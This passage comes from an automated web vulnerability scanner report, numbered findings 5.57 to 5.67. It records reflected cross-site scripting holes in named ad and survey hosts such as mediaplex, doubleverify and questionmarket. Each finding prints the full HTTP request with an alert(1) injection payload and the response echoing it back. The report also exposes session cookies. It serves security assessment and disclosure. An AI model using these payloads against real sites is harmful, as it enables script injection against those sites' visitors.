
5.57. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpjs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html

Issue detail

The value of the mpjs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd0ac"%3balert(1)//c837e622ffd was submitted in the mpjs parameter. This input was echoed as fd0ac";alert(1)//c837e622ffd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930fd0ac"%3balert(1)//c837e622ffd&mpt=[187845622ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:36 GMT
Server: Apache
Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT
ETag: "91db10-12df-4a9283e5e5c40"
Accept-Ranges: bytes
Content-Length: 5515
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]" target="_blank"><img src="ht
...[SNIP]...
&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=8&plc=161611318102790930&advid=421303&sid=161611318102790930&adid= img-cdn.mediaplex.com/0/16161/Nielsen_pixel.js?crid=8095899&plid=161611318102790930fd0ac";alert(1)//c837e622ffd").split( " " );
for( var i = 0; i < mpjs.length; i++ ) {
document.write( "<" + "script type=\"text/javascript\" src=\"http://" + mpjs[i]+ "\">
...[SNIP]...

5.58. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c5b2'%3balert(1)//ac7d3b9268 was submitted in the mpvc parameter. This input was echoed as 9c5b2';alert(1)//ac7d3b9268 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=9c5b2'%3balert(1)//ac7d3b9268 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:37 GMT
Server: Apache
Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT
ETag: "91db10-12df-4a9283e5e5c40"
Accept-Ranges: bytes
Content-Length: 5624
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="9c5b2';alert(1)//ac7d3b9268http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]" t
...[SNIP]...
<a href="9c5b2';alert(1)//ac7d3b9268http://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]" target="_blank">
...[SNIP]...

5.59. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a572"><script>alert(1)</script>d6187dfdcba was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=2a572"><script>alert(1)</script>d6187dfdcba HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:37 GMT
Server: Apache
Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT
ETag: "91db10-12df-4a9283e5e5c40"
Accept-Ranges: bytes
Content-Length: 5702
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="2a572"><script>alert(1)</script>d6187dfdcbahttp://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]" target="_blank">
...[SNIP]...

5.60. http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d29e"%3balert(1)//423b4752c6c was submitted in the mpvc parameter. This input was echoed as 3d29e";alert(1)//423b4752c6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=3d29e"%3balert(1)//423b4752c6c HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:37 GMT
Server: Apache
Last-Modified: Thu, 28 Jul 2011 21:56:57 GMT
ETag: "91db10-12df-4a9283e5e5c40"
Accept-Ranges: bytes
Content-Length: 5629
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="3d29e";alert(1)//423b4752c6chttp://adfarm.mediaplex.com/ad/ck/16161-131810-27909-30?mpt=[187845622ER]"
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("3d29e";alert(1)//423b4752c6c");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("3d29e";alert(1)//423b4752c6c");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("3d29e"%3balert(1)//423b4
...[SNIP]...

5.61. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 5c352<script>alert(1)</script>41b3f27eee6 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=I098395c352<script>alert(1)</script>41b3f27eee6 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://answerology.delish.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 13:57:30 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 13:57:30 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 13:57:30 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "I098395C352<SCRIPT>ALERT(1)</SCRIPT>41B3F27EEE6" was not recognized.
*/

5.62. http://survey.questionmarket.com/surv/913131/newai.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/913131/newai.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8091f><script>alert(1)</script>6105b19a1aabc213a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /surv/913131/newai.php/8091f><script>alert(1)</script>6105b19a1aabc213a?action=nextpage&age=99&country=38&localtime=9-17-2011+14%3A35%3A31&flashinstalled=false&screenheight=1200&screenwidth=1920&x=60&y=24 HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/913131/newai.php?member_id=326080549&site=10&from_aicode=922738
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:59:10 GMT
Server: Apache
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Pragma: no-cache
Expires: -1
Last-Modified: Sat, 17 Sep 2011 14:59:10 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Vary: Accept-Encoding
Content-Length: 8124
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<form method=post action=/surv/913131/newai.php/8091f><script>alert(1)</script>6105b19a1aabc213a name="surveyform" id="surveyform" class="dl_surveyform">
...[SNIP]...

5.63. http://tps31.doubleverify.com/visit.js [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tps31.doubleverify.com
Path:   /visit.js

Issue detail

The value of the plc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14554'%3balert(1)//a7e15116687 was submitted in the plc parameter. This input was echoed as 14554';alert(1)//a7e15116687 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visit.js?ctx=936622&cmp=1059600&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=8&plc=16161131810279093014554'%3balert(1)//a7e15116687&advid=421303&sid=161611318102790930&adid=&&num=312&srcurl=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&curl=&qpgid= HTTP/1.1
Host: tps31.doubleverify.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 14:36:07 GMT
Connection: close

function obaCallback() { new OBACan({ "agncid": '936622', "cmpid": '1059600', "plcid": '16161131810279093014554';alert(1)//a7e15116687', "sid": '161611318102790930' }, { "advName": 'Wells Fargo', "advLink": 'http://www.doubleverify.com/PreferenceManager', "advPolicy": 'https://www.wellsfargo.com/privacy_security/privacy/', "advLogoUR
...[SNIP]...

5.64. http://tps31.doubleverify.com/visit.js [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tps31.doubleverify.com
Path:   /visit.js

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d772'%3balert(1)//d4b9275abe2 was submitted in the sid parameter. This input was echoed as 1d772';alert(1)//d4b9275abe2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visit.js?ctx=936622&cmp=1059600&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=8&plc=161611318102790930&advid=421303&sid=1616113181027909301d772'%3balert(1)//d4b9275abe2&adid=&&num=312&srcurl=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&curl=&qpgid= HTTP/1.1
Host: tps31.doubleverify.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 14:36:17 GMT
Connection: close

function obaCallback() { new OBACan({ "agncid": '936622', "cmpid": '1059600', "plcid": '161611318102790930', "sid": '1616113181027909301d772';alert(1)//d4b9275abe2' }, { "advName": 'Wells Fargo', "advLink": 'http://www.doubleverify.com/PreferenceManager', "advPolicy": 'https://www.wellsfargo.com/privacy_security/privacy/', "advLogoURL": 'http://cdn.doubleverify.
...[SNIP]...

5.65. http://webmedia.oreck.com/cookE/geoip/iframe [@CPSC@ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmedia.oreck.com
Path:   /cookE/geoip/iframe

Issue detail

The value of the @CPSC@ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bdb2"><script>alert(1)</script>caecd352e14 was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=8bdb2"><script>alert(1)</script>caecd352e14 HTTP/1.1
Host: webmedia.oreck.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:06:34 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:34 GMT; path=/; domain=.oreck.com
Set-Cookie: CSList=1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699; expires=Fri, 16 Dec 2011 13:06:34 GMT; path=/; domain=.oreck.com
x_transtrans: 10.6.10.688
Content-Type: text/html
Content-Length: 5505
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611
...[SNIP]...
034&af=1119611&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2112034&ml_camp=1088660&ml_crid=2142475&click=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=8bdb2"><script>alert(1)</script>caecd352e14http://www.oreck.com/Oreck-Graphite-Vacuum-Cleaner?keycode=DS544&ban=Graphite&cstruid=1088660_1113699_2037848_2112034_1119611_2142475">
...[SNIP]...

5.66. http://webmedia.oreck.com/cookE/geoip/iframe [@CPSC@ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmedia.oreck.com
Path:   /cookE/geoip/iframe

Issue detail

The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d8ba'-alert(1)-'162898ef1f3 was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=7d8ba'-alert(1)-'162898ef1f3 HTTP/1.1
Host: webmedia.oreck.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:06:34 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:34 GMT; path=/; domain=.oreck.com
Set-Cookie: CSList=1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699; expires=Fri, 16 Dec 2011 13:06:34 GMT; path=/; domain=.oreck.com
x_transtrans: 11.6.10.688
Content-Type: text/html
Content-Length: 5430
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611
...[SNIP]...
-%253A%2522%2522&ml_pbi=-2112034&ml_camp=1088660&ml_crid=2142475&ml_multiclick=clickTAG1&click=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=7d8ba'-alert(1)-'162898ef1f3http://www.oreck.com/Oreck-Graphite-Vacuum-Cleaner?keycode=DS544&ban=Graphite&cstruid=1088660_1113699_2037848_2112034_1119611_2142475')
+ '&clickTAG2=' + escape('http://webmedia.oreck.com/click.ng?spa
...[SNIP]...

5.67. http://webmedia.oreck.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmedia.oreck.com
Path:   /cookE/geoip/iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e741d"><script>alert(1)</script>b7e5f4284bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=&e741d"><script>alert(1)</script>b7e5f4284bb=1 HTTP/1.1
Host: webmedia.oreck.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:06:34 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:34 GMT; path=/; domain=.oreck.com
